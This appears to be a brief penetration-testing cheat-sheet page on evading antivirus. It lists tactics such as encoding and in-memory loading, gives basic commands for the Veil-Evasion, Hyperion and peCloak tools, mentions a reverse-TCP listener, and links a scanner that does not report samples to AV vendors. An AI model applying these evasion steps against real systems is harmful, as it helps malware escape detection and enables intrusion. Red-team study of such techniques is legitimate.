Evading Anti-Virus

Tactics to evade anti-virus

  • Shutdown AV
  • Ghost Writing
  • Encoding
  • Load malware into memory
  • Custom compilation with various options

Veil

Veil-Evasion is another popular framework written in python. We can use this framework to generate payloads that can evade majority of AVs.

Start up veil

veil.py

List available payload

list

Select payload

Select filename to output

Set up exploit/multi/handler in msfconsole to listen for reverse tcp connection

Hyperion

wine hyperion.exe [input file] [output file]

peCloak

python peCloak.py [input file]

https://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/

Virus checker without distribution to AV vendor

https://nodistribute.com/

results matching ""

    No results matching ""